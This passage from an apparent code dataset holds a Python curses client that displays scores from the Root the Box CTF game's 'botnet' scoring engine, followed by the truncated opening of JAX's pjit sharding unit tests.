on_message: callbale object which is called when received data.
on_message has 2 arguments.
The 1st argument is this class object.
The passing 2nd argument is utf-8 string which we get from the server.
on_error: callable object which is called when we get error.
on_error has 2 arguments.
The 1st argument is this class object.
The passing 2nd argument is exception object.
on_close: callable object which is called when closed the connection.
this function has one argument. The argument is this class object.
keep_running: a boolean flag indicating whether the app's main loop should
keep running, defaults to True
get_mask_key: a callable to produce new mask keys, see the WebSocket.set_mask_key's
docstring for more information
"""
self.url = url
self.header = header or []
self.on_open = on_open
self.on_message = on_message
self.on_error = on_error
self.on_close = on_close
self.keep_running = keep_running
self.get_mask_key = get_mask_key
self.sock = None
def send(self, data, opcode=ABNF.OPCODE_TEXT):
"""
send message.
data: message to send. If you set opcode to OPCODE_TEXT, data must be utf-8 string or unicode.
opcode: operation code of data. default is OPCODE_TEXT.
"""
if self.sock.send(data, opcode) == 0:
raise WebSocketConnectionClosedException()
def close(self):
"""
close websocket connection.
"""
self.keep_running = False
self.sock.close()
def run_forever(self, sockopt=()):
"""
run event loop for WebSocket framework.
This loop is infinite loop and is alive during websocket is available.
sockopt: values for socket.setsockopt.
sockopt must be tuple and each element is argument of sock.setsockopt.
"""
if self.sock:
raise WebSocketException("socket is already opened")
try:
self.sock = WebSocket(self.get_mask_key, sockopt=sockopt)
self.sock.settimeout(getdefaulttimeout())
self.sock.connect(self.url, header=self.header)
self.sock.monitor = self.monitor
self._run_with_no_err(self.on_open)
while self.keep_running:
data = self.sock.recv()
if data is None:
break
self._run_with_no_err(self.on_message, data)
except KeyboardInterrupt:
pass # Just close and exit
except Exception as e:
self._run_with_no_err(self.on_error, e)
finally:
self.sock.close()
self._run_with_no_err(self.on_close)
self.sock = None
def _run_with_no_err(self, callback, *args):
if callback:
try:
callback(self, *args)
except Exception as err:
if logger.isEnabledFor(logging.DEBUG):
logger.error(err)
###################
# > Time to Str
###################
def current_time():
""" Return current time as HH:MM:SS """
return time.strftime("%H:%M:%S")
###################
# > Opcodes
###################
def stop_animate_thread(ws):
""" Block until animation thread exits """
logging.info("Waiting for animation thread to exit ...")
ws.monitor.stop_thread = True
if ws.monitor.animate_thread is not None:
ws.monitor.animate_thread.join()
logging.info("All threads have joined")
ws.monitor.animate_thread = None
ws.monitor.stop_thread = False
def update(ws, message):
""" Recv and draw latest update """
logging.debug("Got update: %s" % message)
bots = []
for bot in message["bots"]:
bots.append((bot["box_name"], bot["remote_ip"], bot["total_reward"]))
ws.monitor.update_grid(bots)
def auth_failure(ws, message):
""" Failed to properly authenticate with scoring engine """
stop_animate_thread(ws)
logging.info("Authentication failure")
ws.monitor.auth_failure("ACCESS DENIED")
def auth_success(ws, message):
""" Successfully authenticated with scoring engine"""
stop_animate_thread(ws)
logging.info("Successfully authenticated")
thread = threading.Thread(target=ws.monitor.progress)
thread.start()
ws.monitor.animate_thread = thread
ws.monitor.__interface__()
def ping(ws, message):
ws.monitor.pong = True
OPCODES = {}
OPCODES["update"] = update
OPCODES["auth_success"] = auth_success
OPCODES["auth_failure"] = auth_failure
OPCODES["ping"] = ping
###################
# > WS Callbacks
###################
def on_open(ws):
""" Send auth when socket is open """
logging.info("Sending credentials to engine")
auth_msg = json.dumps(
{"opcode": "auth", "handle": ws.agent_name, "password": ws.password}
)
ws.send(auth_msg)
ws.monitor.stop_thread = False
def on_message(ws, message):
""" Parse message and call a function """
logging.debug("Recv'd message: %s" % str(message))
try:
response = json.loads(message)
if "opcode" not in response:
raise ValueError("Missing opcode")
elif response["opcode"] not in OPCODES:
raise ValueError("Invalid opcode")
else:
OPCODES[response["opcode"]](ws, response)
except ValueError:
ws.close()
def on_error(ws, error):
""" Error recv'd on WebSocket """
logging.exception("[WebSocket] on_error - %s" % type(error))
stop_animate_thread(ws)
if isinstance(error, socket.error):
ws.monitor.connection_problems()
elif isinstance(error, WebSocketException):
ws.monitor.connection_problems()
ws.monitor.stop()
def on_close(ws):
""" Websocket closed """
logging.debug("[WebSocket] Closing connection.")
stop_animate_thread(ws)
ws.monitor.stop("Connection lost")
###################
# > Bot Monitor
###################
class BotMonitor(object):
""" Manages all flags and state changes """
def __init__(self, connection_url):
self.url = connection_url
self.agent_name = None
self.password = None
self.total_income = 0
self.animate_thread = None
self.pong = False
def start(self):
""" Initializes the screen """
self.screen = curses.initscr()
self.__clear__()
curses.start_color()
curses.use_default_colors()
self.__colors__()
curses.noecho()
curses.cbreak()
curses.curs_set(0)
self.max_y, self.max_x = self.screen.getmaxyx()
self.screen.border(0)
self.screen.refresh()
self.__load__()
self.__connect__()
def stop(self, message=None):
""" Gracefully exits the program """
logging.debug("Stopping curses ui: %s" % message)
self.__clear__()
curses.endwin()
os._exit(0)
def connection_problems(self):
""" Display connection issue, and exit """
logging.fatal("Connection failure!")
self.auth_failure("CONNECTION FAILURE")
def __connect__(self):
""" Connect and authenticate with scoring engine """
ws = WebSocketApp(
self.url, on_message=on_message, on_error=on_error, on_close=on_close
)
ws.monitor = self
ws.agent_name = self.agent_name
ws.password = self.password
ws.on_open = on_open
self.animate_thread = threading.Thread(target=self.__connecting__)
self.stop_thread = False
self.animate_thread.start()
ws.run_forever()
def __connecting__(self):
""" Display connecting animation """
self.__clear__()
self.screen.refresh()
prompt = " Connecting, please wait ..."
connecting = curses.newwin(
3, len(prompt) + 2, (self.max_y / 2) - 1, ((self.max_x - len(prompt)) / 2)
)
connecting.clear()
connecting.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN))
connecting.refresh()
time.sleep(0.25)
while not self.stop_thread:
connecting.addstr(1, 1, " " * len(prompt))
connecting.refresh()
time.sleep(0.15)
connecting.addstr(
1, 1, prompt, curses.A_BOLD | curses.color_pair(self.CYAN)
)
connecting.refresh()
time.sleep(0.25)
connecting.endwin()
def __load__(self):
""" Loads all required data """
self.load_message = " Loading, please wait ... "
self.loading_bar = curses.newwin(
3,
len(self.load_message) + 2,
(self.max_y / 2) - 1,
((self.max_x - len(self.load_message)) / 2),
)
self.loading_bar.border(0)
self.loading_bar.addstr(1, 1, self.load_message, curses.A_BOLD)
self.loading_bar.refresh()
time.sleep(0.5)
self.__credentials__()
self.loading_bar.clear()
def __interface__(self):
""" Main interface loop """
self.__redraw__()
self.screen.nodelay(1)
self.__title__()
self.__grid__()
self.__positions__()
self.screen.refresh()
def __title__(self):
""" Create title and footer """
title = " Root the Box: Botnet Monitor "
start_x = (self.max_x - len(title)) / 2
self.screen.addstr(
0, start_x, title, curses.A_BOLD | curses.color_pair(self.BLUE)
)
self.screen.addstr(0, start_x - 1, "|", curses.A_BOLD)
self.screen.addstr(0, start_x + len(title), "|", curses.A_BOLD)
# Bottom bar
display_time = "[ %s ]" % current_time()
self.screen.addstr(
self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
)
self.screen.addstr(self.max_y - 1, 3, "[---]")
def __grid__(self):
""" Draws the grid layout """
pos_x, pos_y = 3, 3
self.screen.hline(2, 1, curses.ACS_HLINE, self.max_x - 2)
self.screen.hline(4, 1, curses.ACS_HLINE, self.max_x - 2)
# IP Address
self.ip_title = " IP Address "
self.screen.addstr(pos_y, 2, self.ip_title)
self.screen.vline(
pos_y, pos_x + len(self.ip_title), curses.ACS_VLINE, self.max_y - 4
)
# Box Name
pos_x += len(self.ip_title)
self.name_title = " Box Name "
self.screen.addstr(pos_y, pos_x + 1, self.name_title)
self.screen.vline(
pos_y, pos_x + len(self.name_title) + 1, curses.ACS_VLINE, self.max_y - 4
)
# Bot Income
pos_x += len(self.name_title)
self.income_title = " Bot Income "
self.screen.addstr(pos_y, pos_x + 2, self.income_title)
def __positions__(self):
""" Calculates starting x position for each column """
self.start_ip_pos = 2
self.start_name_pos = self.start_ip_pos + len(self.ip_title) + 3
self.start_income_pos = self.start_name_pos + len(self.name_title) + 1
def update_grid(self, boxes):
""" Redraw the grid with updated box information """
self.__interface__()
update_income = sum([box[2] for box in boxes])
self.total_income += update_income
self.__summary__(len(boxes), current_time())
start_row = 5
for index, box in enumerate(boxes):
self.screen.addstr(
start_row + index, self.start_ip_pos, "%d) %s" % (index + 1, box[0])
)
self.screen.addstr(start_row + index, self.start_name_pos, box[1])
if 0 < float(update_income):
percent = (float(box[2]) / float(update_income)) * 100.0
income_string = "$%d (%.02d%s)" % (box[2], percent, "%")
else:
income_string = "$%d" % (box[2],)
self.screen.addstr(start_row + index, self.start_income_pos, income_string)
self.screen.refresh()
def __summary__(self, bot_count, update_time):
""" Addes total bots and update time """
start_pos = 3
pos_y = 1
self.screen.addstr(
pos_y, start_pos, "- Last Update: %s -" % update_time, curses.A_BOLD
)
bot_string = "$%d (%d bots)" % (self.total_income, bot_count)
bot_pos = self.max_x - (len(bot_string) + 3)
self.screen.addstr(pos_y, bot_pos, bot_string, curses.A_BOLD)
def __colors__(self):
""" Init colors pairs """
self.NO_COLOR = -1
self.RED = 1
curses.init_pair(self.RED, curses.COLOR_RED, self.NO_COLOR)
self.CYAN = 2
curses.init_pair(self.CYAN, curses.COLOR_CYAN, self.NO_COLOR)
self.WHITE_RED = 3
curses.init_pair(self.WHITE_RED, curses.COLOR_WHITE, curses.COLOR_RED)
self.BLUE = 4
curses.init_pair(self.BLUE, curses.COLOR_BLUE, self.NO_COLOR)
def __redraw__(self):
""" Redraw the entire window """
self.screen.clear()
self.screen.border(0)
self.screen.refresh()
def __clear__(self):
""" Clears the screen """
self.screen.clear()
self.screen.refresh()
def __credentials__(self):
""" Get display name from user """
self.stop_thread = False
thread = threading.Thread(target=self.__matrix__)
self.loading_bar.clear()
# Get agent name
prompt = "Account: "
self.agent_prompt = curses.newwin(
3,
len(self.load_message) + 2,
(self.max_y / 2) - 1,
((self.max_x - len(self.load_message)) / 2),
)
self.agent_prompt.clear()
self.agent_prompt.border(0)
self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
curses.echo()
thread.start()
self.agent_name = self.agent_prompt.getstr(
1, len(prompt) + 1, len(self.load_message) - len(prompt) - 1
)
# Get password
curses.noecho()
prompt = "Password: "
self.agent_prompt = curses.newwin(
3, # Height
len(self.load_message) + 24, # Width
(self.max_y / 2) - 1, # Start Y
((self.max_x - len(self.load_message)) / 2) - 12, # Start X
)
self.agent_prompt.border(0)
self.agent_prompt.addstr(1, 1, prompt, curses.A_BOLD)
self.password = self.agent_prompt.getstr(1, len(prompt) + 1, 64)
self.stop_thread = True
thread.join() # Wait for "Matrix" threads to stop
def __matrix__(self):
""" Displays really cool, pointless matrix like animation in the background """
# (2) Sat com animation
sat_com = " > Initializing sat com unit, please wait ... "
progress = ["|", "/", "-", "\\"]
for index in range(0, random.randint(50, 150)):
self.screen.addstr(2, 2, sat_com + progress[index % 4])
self.screen.refresh()
time.sleep(0.1)
if self.stop_thread:
return
self.screen.addstr(2, 2, sat_com + "success")
self.screen.refresh()
# (3) Uplink animation
download = " > Establishing satellite uplink: "
for index in range(5, 25):
signal = random.randint(0, 30)
self.screen.addstr(3, 2, download + str(signal) + " dBi ")
self.screen.refresh()
time.sleep(0.2)
if self.stop_thread:
return
self.screen.addstr(3, 2, download + "locked on")
self.screen.refresh()
# (4) Downloading animation
download = " > Downloading noki telcodes: "
for index in range(0, 100):
self.screen.addstr(4, 2, download + str(index) + "%")
self.screen.refresh()
time.sleep(0.1)
if self.stop_thread:
return
self.screen.addstr(4, 2, download + "complete")
self.screen.refresh()
# (5) Initializing memory address
memory = " > Initializing memory: "
for index in xrange(0, 2 ** 32, 2 ** 20):
time.sleep(0.02)
self.screen.addstr(5, 2, memory + str("0x%08X" % index))
self.screen.refresh()
if self.stop_thread:
return
self.screen.addstr(5, 2, memory + str("0x%08X -> 0xFFFFFFFF" % (0,)))
self.screen.refresh()
# (6) Matrix animation
matrix = " > The matrix has you ... follow the white rabbit "
for index in range(0, len(matrix)):
time.sleep(0.2)
self.screen.addstr(6, 2, matrix[:index])
self.screen.refresh()
if self.stop_thread:
return
def progress(self):
""" Progress animation, executed as seperate thread """
index = 0
progress_bar = ["=--", "-=-", "--=", "-=-"]
pong_string = "PNG"
while not self.stop_thread:
if self.pong:
self.screen.addstr(self.max_y - 1, 3, "[")
self.screen.addstr(
self.max_y - 1, 4, pong_string, curses.color_pair(self.WHITE_RED)
)
self.screen.addstr(self.max_y - 1, 7, "]")
self.pong = False
else:
index += 1
progress_string = "[%s]" % (progress_bar[index % len(progress_bar)])
self.screen.addstr(self.max_y - 1, 3, progress_string)
display_time = "[ %s ]" % current_time()
self.screen.addstr(
self.max_y - 1, (self.max_x - len(display_time)) - 3, display_time
)
self.screen.refresh()
time.sleep(0.2)
def auth_failure(self, msg):
""" Display authentication failure message """
logging.info("Displaying auth failure message")
self.__clear__()
self.screen.refresh()
prompt = " *** %s *** " % msg
access_denied = curses.newwin(
3, len(prompt) + 2, (self.max_y / 2) - 1, ((self.max_x - len(prompt)) / 2)
)
access_denied.addstr(1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED))
access_denied.refresh()
time.sleep(0.75)
for index in range(0, 5):
access_denied.addstr(1, 1, " " * len(prompt))
access_denied.refresh()
time.sleep(0.25)
access_denied.addstr(
1, 1, prompt, curses.A_BOLD | curses.color_pair(self.RED)
)
access_denied.refresh()
time.sleep(0.75)
self.stop()
###################
# > Main Entry
###################
def main(domain, port, secure, log_file, log_level):
""" Creates and starts the monitor """
hdlr = logging.FileHandler(log_file)
formatter = logging.Formatter("\r[%(levelname)s] %(asctime)s - %(message)s")
hdlr.setFormatter(formatter)
logger.addHandler(hdlr)
lvl = LOG_LEVELS.get(log_level, "notset")
logger.setLevel(lvl)
enableTrace(True)
if not secure:
url = "ws://%s:%s%s" % (domain, port, __path__)
else:
url = "wss://%s:%s%s" % (domain, port, __path__)
logging.info("Connecting to %s" % url)
bot_monitor = BotMonitor(url)
try:
bot_monitor.start()
except KeyboardInterrupt:
bot_monitor.stop_thread = True
time.sleep(0.2)
os._exit(0)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Root the Box: Botnet Monitor")
parser.add_argument(
"--version", action="version", version="%(prog)s v" + __version__
)
parser.add_argument(
"--secure",
help="connect using a ssl (default: false)",
action="store_true",
dest="secure",
)
parser.add_argument(
"--domain",
"-d",
help="scoring engine ip address, or domain (default: %s)" % __domain__,
default=__domain__,
dest="domain",
)
parser.add_argument(
"--port",
"-p",
help="network port to connect to (default: %s)" % __port__,
default=__port__,
dest="port",
)
parser.add_argument(
"--log-file",
"-f",
help="log to file (default: %s)" % __log__,
default=__log__,
dest="log_file",
)
parser.add_argument(
"--log-level",
"-l",
help="log to file (default: notset)",
default="notset",
dest="log_level",
)
args = parser.parse_args()
main(args.domain, args.port, args.secure, args.log_file, args.log_level.lower())
|
pjit_test.py | # Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import re
from functools import partial
import logging
import threading
import unittest
from collections import OrderedDict, namedtuple
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
import jax
import jax.numpy as jnp
from jax._src import test_util as jtu
from jax.errors import JAXTypeError
from jax import lax
# TODO(skye): do we still wanna call this PartitionSpec?
from jax.experimental import maps
from jax.experimental import PartitionSpec as P
from jax.experimental.maps import xmap
from jax.experimental import global_device_array
import jax.experimental.pjit as pjit_lib
from jax.experimental.pjit import (pjit, pjit_p, with_sharding_constraint,
SpecSync, FROM_GDA)
from jax.interpreters import pxla
from jax.interpreters import xla
from jax._src.lib import xla_client, xla_extension_version, xla_bridge
from jax._src.util import prod, curry, unzip2, safe_zip
from jax.config import config
config.parse_flags_with_absl()
if xla_extension_version >= 60:
prev_xla_flags = None
def setUpModule():
if xla_extension_version >= 60:
global prev_xla_flags
prev_xla_flags = os.getenv("XLA_FLAGS")
flags_str = prev_xla_flags or ""
# Don't override user-specified device count, or other XLA flags.
if "xla_force_host_platform_device_count" not in flags_str:
os.environ["XLA_FLAGS"] = (flags_str +
" --xla_force_host_platform_device_count=8")
# Clear any cached backends so new CPU backend will pick up the env var.
xla_bridge.get_backend.cache_clear()
else:
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest("pjit only supports GPU and TPU backends")
jtu.set_spmd_lowering_flag(True)
def tearDownModule():
if xla_extension_version >= 60:
if prev_xla_flags is None:
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = prev_xla_flags
xla_bridge.get_backend.cache_clear()
jtu.restore_spmd_lowering_flag()
def create_gda(global_shape, global_mesh, mesh_axes):
global_data = np.arange(
prod(global_shape), dtype=np.float32).reshape(global_shape)
return global_device_array.GlobalDeviceArray.from_callback(
global_shape, global_mesh, mesh_axes, lambda idx: global_data[idx])
@curry
def check_1d_2d_mesh(f, set_mesh):
return parameterized.named_parameters(
{"testcase_name": "_" + name, "mesh": mesh, "resources": resources}
for name, mesh, resources in (
("2", (("x", 2),), "x"),
("2x1", (("x", 2), ("y", 1)), ("x", "y")),
("2x2", (("x", 2), ("y", 2)), ("x", "y")),
))(jtu.with_mesh_from_kwargs(f) if set_mesh else f)
# TODO(skye): make the buffer donation utils part of JaxTestCase
class PJitTest(jtu.BufferDonationTestCase):
@jtu.with_mesh([('x', 1)])
def testDeviceBufferAval(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=P('x'))
def f(x):
return x
shape = (2, 2)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x)
expected = x
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 1)
self.assertAllClose(
actual.device_buffers[0].to_py(), expected, check_dtypes=False)
# Repro for a bug on device_buffer aval
_ = repr(actual.device_buffers)
@jtu.with_mesh([('x', 2)])
def testBasic1D(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testUnevenShardingConstraint(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
x = x[:3]
y = y[:3]
x = with_sharding_constraint(x, P('x'))
y = with_sharding_constraint(y, P('x'))
out = x + y
return jnp.pad(out, [[0, 1]])
shape = (4,)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertAllClose(actual[:3], expected[:3], check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py()[:3], expected[:3],
check_dtypes=False)
def testBasic1DWithMeshContextManager(self):
@partial(pjit,
in_axis_resources=(P('x'), P('x')),
out_axis_resources=None)
def f(x, y):
return x + y
shape = (8, 8)
x = np.arange(prod(shape), dtype=np.float32).reshape(shape)
with jtu.create_global_mesh((2,), ('x')) as mesh:
actual = f(x, x + 1)
expected = x + (x + 1)
self.assertEqual(mesh, jtu.create_global_mesh((2,), ('x')))
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testBasic2D(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
def testBasic2DWithMeshContextManager(self):
@partial(pjit,
in_axis_resources=(P(None, 'x', 'y'), P('y')),
out_axis_resources=P('x'))
def f(x, y):
return x @ y
x_shape = (8, 6, 4)
y_shape = (4, 2)
x = jnp.arange(np.prod(x_shape)).reshape(x_shape)
y = jnp.arange(np.prod(y_shape)).reshape(y_shape)
mesh = jtu.create_global_mesh((2, 2), ('x', 'y'))
with mesh:
actual = f(x, y)
expected = x @ y
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
split0, split1 = np.split(expected, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), split0,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), split1,
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), split1,
check_dtypes=False)
def testDifferentNestedMesh(self):
with jtu.create_global_mesh((2, 1), ("x", "y")) as m1:
with jtu.create_global_mesh((2, 2), ("a", "b")) as m2:
self.assertEqual(pxla.thread_resources.env.physical_mesh, m2)
self.assertEqual(pxla.thread_resources.env.physical_mesh, m1)
self.assertEqual(pxla.thread_resources.env.physical_mesh,
pxla.EMPTY_ENV.physical_mesh)
def testSameNestedMesh(self):
mesh = jtu.create_global_mesh((2, 1), ("a", "b"))
with mesh as m1:
with mesh as m2:
self.assertEqual(pxla.thread_resources.env.physical_mesh, m2)
self.assertEqual(pxla.thread_resources.env.physical_mesh, m1)
self.assertEqual(pxla.thread_resources.env.physical_mesh,
pxla.EMPTY_ENV.physical_mesh)
def testMeshDecorator(self):
x = jnp.arange(8)
mesh_shape = (2, 2)
size = prod(mesh_shape)
if len(jax.devices()) < size:
raise unittest.SkipTest(f"Test requires {size} global devices.")
mesh_devices = np.array(jax.devices()[:size]).reshape(mesh_shape)
@maps.Mesh(mesh_devices, ('x', 'y'))
def dec():
return pjit(lambda x: x, in_axis_resources=P('x'), out_axis_resources=None)(x)
out = dec()
self.assertArraysEqual(out, x)
@jtu.with_mesh([('x', 2), ('y', 2)])
def testTwoMeshAxisSharding(self):
@partial(pjit,
in_axis_resources=P(('x', 'y'),),
out_axis_resources=P(('x', 'y'),))
def f(x, y):
return x @ y
shape = (8, 8)
x = jnp.arange(np.prod(shape)).reshape(shape)
actual = f(x, x + 1)
expected = x @ (x + 1)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 4)
splits = np.split(expected, 4)
self.assertAllClose(actual.device_buffers[0].to_py(), splits[0],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[1].to_py(), splits[1],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[2].to_py(), splits[2],
check_dtypes=False)
self.assertAllClose(actual.device_buffers[3].to_py(), splits[3],
check_dtypes=False)
@jtu.with_mesh([('x', 2)])
def testBufferDonation(self):
if jax.default_backend() not in {'gpu', 'tpu'}:
raise unittest.SkipTest('Buffer donation only supported on GPU and TPU')
@partial(pjit,
in_axis_resources=P('x'),
out_axis_resources=P('x'),
donate_argnums=0)
def f(x, y):
return x + y
shard = pjit(lambda x: x, in_axis_resources=P('x'),
out_axis_resources=P('x'))
x = shard(jnp.ones((2, 5)) * 4)
y = shard(jnp.ones((2, 5)) * 2)
expected = x + y
self.assertAllClose(f(x, y), expected)
self.assertNotDeleted(y)
self.assertDeleted(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraint(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
y = x + 1
y = with_sharding_constraint(y, P('x', 'y'))
return y * 2
shape = (8, 8)
x = np.arange(prod(shape)).reshape(shape)
expected = (x + 1) * 2
actual = f(x)
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertIsInstance(actual, pxla.ShardedDeviceArray)
self.assertLen(actual.device_buffers, 2)
self.assertAllClose(actual.device_buffers[0].to_py(), expected,
check_dtypes=False)
hlo = jax.xla_computation(f)(np.ones(shape))
# Annotation from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 1)])
def testShardingConstraintPyTree(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(x, [P('x', 'y'), P('y', 'x')])
x = x.copy()
x[0]["a"] *= 2
return x
shape = (8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{"a": v, "b": v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]["a"] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]["a"].device_buffers, 2)
hlo = jax.xla_computation(f)(x)
# Annotations from with_sharding_constraint
self.assertIn("sharding={devices=[2,1]0,1}", hlo.as_hlo_text())
self.assertIn("sharding={devices=[1,2]0,1}", hlo.as_hlo_text())
# Annotation from pjit
self.assertIn("sharding={replicated}", hlo.as_hlo_text())
@jtu.with_mesh([('x', 2), ('y', 2)])
def testShardingConstraintPyTreeWithUnconstrainedDims(self):
@partial(pjit, in_axis_resources=None, out_axis_resources=None)
def f(x):
x = with_sharding_constraint(
x, [P(P.UNCONSTRAINED, 'y', None),
P('x', P.UNCONSTRAINED, None)])
x = x.copy()
x[0]['a'] *= 2
return x
shape = (2, 8, 8)
v = np.arange(prod(shape)).reshape(shape)
x = [{'a': v, 'b': v * 2}, v * 3]
actual = f(x)
expected = x.copy()
expected[0]['a'] *= 2
self.assertAllClose(actual, expected, check_dtypes=False)
self.assertLen(actual[0]['a'].device_buffers, 4)
mhlo_str = str(f.lower(x).compiler_ir(dialect="mhlo"))
self.assertIn("unspecified_dims=[0]", mhlo_str)
self.assertIn("unspecified_dims=[1]", mhlo_str)
def testCaching(self):
def f(x):
assert should_be_tracing
return jnp.sin(x) * 2
x = np.arange(16).reshape(4, 4)
devices = np.array(list(jax.local_devices())[:4])
if devices.size < 4:
raise unittest.SkipTest("Test requires 4 devices")
devices = devices.reshape((2, 2))
with maps.Mesh(devices, ('x', 'y')):
should_be_tracing = True
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
# Re-create the mesh to make sure that has no influence on caching
with maps.Mesh(devices, ('x', 'y')):
should_be_tracing = False
pjit(f, in_axis_resources=P(('x', 'y')), out_axis_resources=None)(x)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testNested(self):
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum() + h.sum(), in_axis_resources=P('x', 'y'), out_axis_resources=None)
g = pjit(lambda x: f(jnp.sin(x)), in_axis_resources=P('x', None), out_axis_resources=None)
x = jnp.arange(16).reshape((4, 4))
y = g(x)
self.assertAllClose(y, jnp.sin(x).sum() + h.sum())
self.assertTrue(hasattr(y, "sharding_spec"))
@check_1d_2d_mesh(set_mesh=True)
def testAutodiff(self, mesh, resources):
if len(mesh) != 2: return
assert resources == ('x', 'y')
# Add a constant captured by the nested pjit to make things more complicated
h = jnp.arange(4)
f = pjit(lambda x: x.sum(1) * h.sum(),
in_axis_resources=P('x', 'y'), out_axis_resources=P(('x', 'y')))
g = pjit(lambda x: f(jnp.sin(x * 4 + 2)),
in_axis_resources=P('x', None), out_axis_resources=P(('x', 'y')))
jtu.check_grads(g, (jnp.arange(16, dtype=jnp.float32).reshape((4, 4)) / 100,),
order=2)
@jtu.with_mesh([('x', 2), ('y', 1)])
def testEvalJaxpr(self):
x, y = jnp.arange(4), jnp.arange(5)
f = pjit(lambda x, y: x.sum() + jnp.sin(y),
in_axis_resources=(P('x'), P('y')),
out_axis_resources=P('y'))
f_jaxpr = jax.make_jaxpr(f)(x, y)
f_eval = jax.core.jaxpr_as_fun(f_jaxpr)
r, = f_eval(x, y)
self.assertAllClose(r, x.sum() + jnp.sin(y))
@jtu.with_mesh([('x', 2)])
def testNonArrayArg(self):
self.assertEqual(pjit(lambda x: x + 2,
in_axis_resources=None,
out_axis_resources=None)(1), 3)
@jtu.with_mesh([('x', 2)])
def testNonHashableAxisResources(self):
x = jnp.arange(4)
y = pjit(lambda x: {'b': x['a'] + 2},
in_axis_resources=({'a': P('x')},),
out_axis_resources={'b': P('x')})({'a': x})
self.assertAllClose(y, {'b': x + 2})
@jtu.with_mesh([('x', 2)])
def testGradOfConstraint(self):
# Make sure that we can compute grads through sharding constraints
h = lambda x: jnp.sin(with_sharding_constraint(x, P('x'))).sum()
f = pjit(lambda x: jax.grad(h)(x),
in_axis_resources=None, out_axis_resources=None)
x = jnp.arange(8, dtype=jnp.float32)
self.assertAllClose(f(x), jnp.cos(x))
@jtu.with_mesh([('x', 2)])
def testNoopPartitionSpecs(self):
noops = [P(), P(None), P(()), P((), None), P(None, None, ())]
x = jnp.arange(8).reshape((2, 2, 2))
for spec in noops:
